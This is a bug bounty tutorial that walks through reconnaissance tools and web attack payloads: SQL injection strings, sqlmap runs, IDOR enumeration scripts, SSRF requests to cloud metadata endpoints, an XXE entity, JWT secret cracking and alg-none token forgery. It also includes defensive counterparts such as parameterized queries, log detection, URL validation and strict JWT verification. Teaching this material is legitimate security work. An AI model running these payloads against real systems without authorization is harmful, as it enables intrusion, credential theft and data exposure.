
Introduction:
The path from a novice to a successful bug bounty hunter is paved with persistence, strategy, and a deep understanding of common vulnerability classes. While many are drawn to the field by the allure of high-value rewards, sustained success requires a methodical approach to target selection, reconnaissance, and exploitation. This guide demystifies that journey, providing the technical arsenal needed to advance from informational findings to critical P1 and P2 vulnerabilities.
Learning Objectives:
- Master the core reconnaissance methodology for expanding your attack surface.
- Understand and exploit common vulnerability chains in modern web applications.
- Learn to weaponize findings for maximum impact and bounty value.
You Should Know:
1. Passive Reconnaissance: The Art of Digital Footprinting
Effective hunting begins with intelligence gathering. Passive reconnaissance allows you to map a target’s external presence without sending a single packet to their servers directly.
Verified Commands & Tools:
# Subdomain enumeration using Amass (passive mode)
amass enum -passive -d target.com -o domains.txt
# Discovering assets via Project Discovery's Chaos
chaos -d target.com -o chaos_domains.txt
# Using Subfinder for fast subdomain discovery
subfinder -d target.com -o subfinder_domains.txt
# Fetching known URLs from the Wayback Machine
waybackurls target.com > urls.txt
# Using GitHub code search for exposed secrets and code (GitHub CLI)
gh api -X GET search/code -f q='target.com password' --jq '.items[].html_url'
Step-by-step guide:
First, install the tools via your package manager (e.g., apt, brew). Run `amass` in passive mode to gather subdomains from public sources without direct interaction. Combine the results from `subfinder` and `chaos` into a master list. Use `waybackurls` to extract historical endpoints and parameters from the Wayback Machine. Finally, leverage GitHub’s code search with the `gh` CLI to scan for accidentally committed API keys, passwords, or internal infrastructure references related to your target. This layered approach ensures a comprehensive view of the attack surface.
2. Active Reconnaissance: Probing the Live Surface
Once you have a list of domains and URLs, active reconnaissance involves interacting with the targets to discover live hosts, open ports, and running services.
Verified Commands & Tools:
# Probing for HTTP/HTTPS services with httpx
cat domains.txt | httpx -silent -ports 80,443,8080,8443 -o live_hosts.txt
# Fast TCP port scanning with naabu
naabu -list domains.txt -top-ports 1000 -o naabu_ports.txt
# Web application fuzzing with ffuf for directories
ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt -mc all -o dir_scan.json
# Fuzzing for virtual hosts with ffuf
ffuf -u https://target.com -H "Host: FUZZ.target.com" -w subdomains.txt -mc all -fr "not-found"
Step-by-step guide:
Feed your list of domains into `httpx` to identify which hosts are alive and responding on common web ports. Use `naabu` for a broader TCP port scan to uncover non-HTTP services like databases (port 3306), SSH (port 22), or custom API ports. With your list of live web hosts, begin fuzzing for directories and files using FFuf. The virtual host fuzzing technique is critical for uncovering hidden sites or development/staging environments hosted on the same IP address.
3. Identifying Common Vulnerability Classes: SQL Injection
SQL Injection remains a high-impact vulnerability, especially when found in authenticated portions of an application or chained with other issues.
Verified Command & Code Snippet:
# Using sqlmap to test a parameter
sqlmap -u "https://target.com/products?id=1" --batch --level=3 --risk=3
# Manual test payload for the id parameter; -G with --data-urlencode URL-encodes the
# quotes and spaces, which a bare URL in the query string would not survive
curl -s -G "https://target.com/products" --data-urlencode "id=1' OR '1'='1'--"

-- Union-based SQLi payloads to determine the number of columns
' ORDER BY 1--
' UNION SELECT 1,2,3--
Step-by-step guide:
After identifying a parameter (like id, user, or category), start with a simple single quote (') to test for error-based SQLi. If an error is returned, proceed with more sophisticated payloads. Use the `ORDER BY` clause to incrementally determine the number of columns. Once known, use the `UNION SELECT` statement to extract data from the database. For automated and thorough testing, `sqlmap` can enumerate database names, tables, and even execute operating system commands in advanced cases. Always ensure you have explicit permission before using automated tools.
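Added example (not code from the original post) showing why the quote-based payload above changes the query, and how a bound parameter neutralises it; the in-memory SQLite table is constructed for the demo:

```python
import sqlite3

# Constructed in-memory table standing in for the /products?id= backend above.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, internal INTEGER)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(1, "widget", 0), (2, "gadget", 0), (3, "internal-sku", 1)])
    return conn

def lookup_vulnerable(conn, product_id):
    # Untrusted input is spliced into the SQL text: the quote in the payload
    # closes the literal, OR '1'='1' is always true, and -- comments out the rest.
    sql = f"SELECT id, name FROM products WHERE id = '{product_id}'"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, product_id):
    # Bound parameter: the value never becomes SQL text, so quotes, OR and --
    # inside it are just characters of the string being compared.
    sql = "SELECT id, name FROM products WHERE id = ?"
    return conn.execute(sql, (product_id,)).fetchall()

PAYLOAD = "1' OR '1'='1'--"   # the tautology payload from the curl example above

def demo():
    conn = make_db()
    return {
        "vuln_normal": lookup_vulnerable(conn, "1"),      # one row, as intended
        "vuln_payload": lookup_vulnerable(conn, PAYLOAD),  # every row leaks
        "safe_normal": lookup_safe(conn, "1"),            # one row
        "safe_payload": lookup_safe(conn, PAYLOAD),        # no row matches that string
    }
```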
4. Exploiting Access Control Flaws: IDOR & Broken Object-Level Authorization
Insecure Direct Object References (IDOR) are classic P2/P3 vulnerabilities that can often be escalated to P1 by demonstrating impact on other users’ data.
Verified Command & Code Snippet:
# Baseline request for a direct object reference with curl (your own user)
curl -H "Authorization: Bearer <your_token>" https://api.target.com/v1/users/12345/profile
# Testing for horizontal privilege escalation (another user's ID)
curl -H "Authorization: Bearer <your_token>" https://api.target.com/v1/users/12346/profile
# Testing for vertical privilege escalation by accessing an admin endpoint
curl -H "Authorization: Bearer <your_token>" https://api.target.com/v1/admin/users

GET /api/v1/invoices/1001 HTTP/1.1
Host: target.com
Authorization: Bearer <user_jwt_token>
Step-by-step guide:
While using the application, note any endpoints that use an obvious identifier (user ID, account number, document ID). Authenticate to the application and capture your own request. Systematically change the identifier in the request (e.g., from `1001` to `1002`). If you can access another user’s data, you have found a valid IDOR. To increase the severity, attempt to access administrative endpoints or functions by guessing the path or modifying your JWT token claims if they are poorly validated.
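From the defender's side, an added example (not part of the original post) that spots the sequential-ID probing described above in access logs; the log format and token labels are constructed for the demo:

```python
import re
from collections import defaultdict

# Constructed access-log lines (token id, method, path, status), not real traffic.
LOG_LINES = """\
tok_a GET /api/v1/invoices/1001 200
tok_a GET /api/v1/invoices/1002 200
tok_a GET /api/v1/invoices/1003 403
tok_a GET /api/v1/invoices/1004 200
tok_a GET /api/v1/invoices/1005 200
tok_b GET /api/v1/invoices/2200 200
tok_b GET /api/v1/users/2200/profile 200
tok_c GET /api/v1/users/12345/profile 200
tok_c GET /api/v1/users/12346/profile 200
tok_c GET /api/v1/users/12347/profile 404
""".splitlines()

OBJECT_PATH = re.compile(r"^/api/v1/(?P<resource>users|invoices)/(?P<id>\d+)")

def parse(line):
    token, _method, path, status = line.split()
    m = OBJECT_PATH.match(path)
    return (token, m["resource"], int(m["id"]), int(status)) if m else None

def find_enumeration(lines, min_run=3, max_gap=1):
    """Flag tokens that requested a run of adjacent object IDs on one resource,
    the trace a range(100, 110)-style loop leaves behind.
    Returns {token: {resource: {"ids": [...], "ok": <count of 200 responses>}}}."""
    seen = defaultdict(lambda: defaultdict(dict))   # token -> resource -> {id: status}
    for line in lines:
        rec = parse(line)
        if rec:
            token, resource, obj_id, status = rec
            seen[token][resource][obj_id] = status
    flagged = {}
    for token, resources in seen.items():
        for resource, hits in resources.items():
            ids = sorted(hits)
            run = longest = 1
            for prev, cur in zip(ids, ids[1:]):
                run = run + 1 if cur - prev <= max_gap else 1
                longest = max(longest, run)
            if longest >= min_run:
                ok = sum(1 for s in hits.values() if s == 200)
                flagged.setdefault(token, {})[resource] = {"ids": ids, "ok": ok}
    return flagged
```

A high count of 200s on IDs the caller does not own is the authorization bug itself; the 403/404 mixed into the run shows the check exists for some objects but not all.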
5. Server-Side Request Forgery (SSRF): From Internal Recon to Cloud Metadata Exploitation
SSRF vulnerabilities can be devastating, allowing attackers to probe and interact with internal systems, often leading to P1 ratings.
Verified Command & Code Snippet:
# Testing for basic SSRF
curl -X POST https://target.com/webhook -H "Content-Type: application/json" -d '{"url":"http://localhost:8080"}'
# Attempting to access cloud instance metadata
# AWS EC2
curl -X POST https://target.com/fetch -d 'url=http://169.254.169.254/latest/meta-data/'
# GCP
curl -X POST https://target.com/fetch -d 'url=http://metadata.google.internal/computeMetadata/v1/' -H 'Metadata-Flavor: Google'

<!-- Testing with XXE to achieve SSRF -->
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/"> ]>
<data>&xxe;</data>
Step-by-step guide:
Identify functionality that fetches external resources: webhooks, image uploads, document processors, or API endpoints that take a URL parameter. Start by trying to make the server call back to a service you control (using Burp Collaborator or a webhook.site URL). If successful, attempt to access internal resources like localhost, the internal network gateway (192.168.1.1), or cloud provider metadata endpoints. The ability to retrieve IAM roles or access keys from the metadata service is typically a critical (P1) finding.
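Added example of the server-side check that stops the localhost, gateway and metadata requests above (not code from the original post); the resolver stub, hostnames and addresses are constructed so it runs offline:

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed resolver stub so the example runs offline; in production the
# hostname is resolved with real DNS and every returned address is checked.
FAKE_DNS = {
    "metadata.google.internal": ["169.254.169.254"],
    "localhost": ["127.0.0.1"],
    "cdn.example.com": ["93.184.216.34"],
    "rebind.example.com": ["93.184.216.34", "10.0.0.5"],   # one public, one internal
}

ALLOWED_SCHEMES = {"http", "https"}

def is_public(ip):
    # is_global is False for loopback, link-local (so 169.254.169.254), RFC 1918,
    # ULA, reserved and unspecified addresses; multicast is excluded separately.
    addr = ipaddress.ip_address(ip)
    return addr.is_global and not addr.is_multicast

def validate_fetch_url(url, resolve=lambda host: FAKE_DNS.get(host, [])):
    """Return (ok, reason). The caller picks the name, so every address it
    resolves to must be public, not just the first one."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        addrs = [str(ipaddress.ip_address(host))]   # literal IPv4/IPv6 given directly
    except ValueError:
        addrs = resolve(host)
    if not addrs:
        return False, f"{host} does not resolve"
    for ip in addrs:
        if not is_public(ip):
            return False, f"{host} resolves to non-public {ip}"
    return True, "ok"
```

The same check has to run on every redirect target and on the address actually connected to, because a name can be re-resolved between validation and use.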
6. JWT Vulnerabilities: Bypassing Authentication
JSON Web Tokens (JWT) are ubiquitous, and misconfigurations in their validation can lead to full authentication bypass.
Verified Command & Code Snippet:
# Decoding a JWT manually (or paste it into jwt.io). The three dot-separated segments are
# unpadded base64url, so decode the header and payload separately; base64 -d may warn
# about missing padding after printing the JSON
token='eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c'
echo "$token" | cut -d. -f1 | tr '_-' '/+' | base64 -d 2>/dev/null; echo
echo "$token" | cut -d. -f2 | tr '_-' '/+' | base64 -d 2>/dev/null; echo
# Using John the Ripper to crack a weak JWT secret
echo "$token" > jwt.txt
john --wordlist=/usr/share/wordlists/rockyou.txt jwt.txt

# Python script to forge a JWT token with the "none" algorithm (requires the PyJWT package)
import jwt

# With alg "none" there is no signature; a server that trusts the header's alg accepts it
forged_token = jwt.encode({"user": "admin"}, algorithm="none", key="")
print(forged_token)
Step-by-step guide:
Capture a JWT token from the application. Decode it (the first two parts are base64url-encoded) to inspect its header and payload. Check the `alg` field in the header. If it is set to `none`, you can simply remove the signature and send the token. If a weak secret is suspected, use a tool like `john` with a wordlist to crack it. Also, test for algorithm confusion attacks by changing the `alg` from `RS256` to `HS256` and using the public key as the HMAC secret.
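Added example (not code from the original post) of the verification the above attacks rely on being absent: the algorithm is pinned server-side and signatures are compared in constant time, so an alg-none token, a token whose payload was edited after signing, and an RS256-to-HS256 swap are all rejected; the secret and payloads are constructed:

```python
import base64, hashlib, hmac, json

def b64url_decode(s):
    # JWT segments are unpadded base64url (which is why `base64 -d` on the
    # whole token fails); restore the padding before decoding.
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def b64url_encode(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def decode_unverified(token):
    """Header and payload as dicts, no signature check: for inspection only."""
    h, p, _sig = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p))

def sign_hs256(payload, secret):
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url_encode(json.dumps(payload).encode())
    mac = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(mac)}"

def verify_hs256(token, secret):
    """Return the payload only for a genuine HS256 token. The header's alg is
    compared to the pinned value, never used to pick the verifier."""
    try:
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
    except (ValueError, UnicodeDecodeError):
        raise ValueError("malformed token")
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        raise ValueError(f"unexpected alg {header.get('alg')!r}")
    mac = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(mac, b64url_decode(s)):   # constant-time compare
        raise ValueError("bad signature")
    return json.loads(b64url_decode(p))

def check(token, secret):
    try:
        return True, verify_hs256(token, secret)
    except ValueError as e:
        return False, str(e)

def demo(secret=b"constructed-demo-secret"):
    good = sign_hs256({"user": "alice"}, secret)
    h, body, sig = good.split(".")
    none_token = b64url_encode(b'{"alg":"none"}') + "." + body + "."   # alg=none, no signature
    admin = b64url_encode(b'{"user": "admin"}')
    resigned = f"{h}.{admin}.{sig}"                                    # payload edited, old signature kept
    return check(good, secret), check(none_token, secret), check(resigned, secret)
```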
7. Automating the Workflow: Scripting for Efficiency
The most successful hunters automate repetitive tasks to focus on complex vulnerability chains.
Verified Command & Code Snippet:
#!/bin/bash
# Basic recon and live host check script
domain=$1
[ -z "$domain" ] && { echo "usage: $0 <domain>"; exit 1; }
echo "[+] Starting reconnaissance for $domain"
subfinder -d "$domain" -o "subfinder_$domain.txt"
amass enum -passive -d "$domain" -o "amass_$domain.txt"
cat "subfinder_$domain.txt" "amass_$domain.txt" | sort -u > "all_subs_$domain.txt"
echo "[+] Probing for live hosts..."
httpx -l "all_subs_$domain.txt" -ports 80,443,8080,8443,3000 -o "live_$domain.txt"
echo "[+] Scanning for open ports..."
naabu -list "all_subs_$domain.txt" -top-ports 100 -o "ports_$domain.txt"
echo "[+] Recon complete. Live hosts: live_$domain.txt"
# Python script to check for IDOR on a list of endpoints
import requests

def test_idor(url_template, token, id_list):
    """Request each object ID with the same bearer token and report the ones that succeed."""
    headers = {'Authorization': f'Bearer {token}'}
    for obj_id in id_list:
        url = url_template.format(id=obj_id)
        r = requests.get(url, headers=headers)
        if r.status_code == 200:
            print(f"[!] Possible IDOR: {url}")

# Usage: the template needs the named {id} placeholder that format(id=...) fills
test_idor('https://api.target.com/user/{id}', 'your_jwt_token_here', range(100, 110))
Step-by-step guide:
Create a bash script (like the one above) to automate the initial reconnaissance phase. Save it as recon.sh, give it execute permissions (chmod +x recon.sh), and run it with your target domain (./recon.sh example.com). For vulnerability-specific checks, a simple Python script can automate testing for issues like IDOR across a range of object IDs. This frees up significant time for manual testing of complex business logic flaws.
What Undercode Say:
- Depth Over Breadth: As highlighted by the hunter’s journey, mastering a single program for an extended period yields far better results than superficial testing across dozens. You develop an intimate knowledge of the application’s architecture, business logic, and where its weak points are likely to be.
- Persistence is a Weapon: The transition from “Not Applicable” and “Duplicate” to valid P3, P2, and eventually P1 findings is a universal trajectory. The key differentiator is not innate skill but the resilience to continue learning from rejections and refining your methodology.
The bug bounty landscape is not a get-rich-quick scheme but a professional field requiring a hacker’s mindset and an engineer’s discipline. The most critical vulnerabilities are often not found by a single clever payload but by chaining smaller, seemingly insignificant flaws—an IDOR here, an open redirect there—into a full-chain exploit. The tools and commands provided are the brush and chisel, but the hunter’s strategic focus and tenacity are the true art.
Prediction:
The future of bug bounties will be dominated by AI-assisted hunting, both on the offensive and defensive sides. AI will automate the initial vulnerability discovery phase, pushing human hunters to focus on complex, multi-step logic flaws and novel attack vectors that machines cannot yet comprehend. Furthermore, as applications become more complex and shift towards API-first and serverless architectures, vulnerabilities in business logic, authorization schemes, and cloud service misconfigurations will become the primary source of critical bounties, surpassing traditional web vulnerabilities like XSS and basic SQLi. The hunters who adapt to this complexity and learn to exploit the interactions between modern microservices will be the most successful.
Reported By: Madhavan77777 Bugcrowd – Hackers Feeds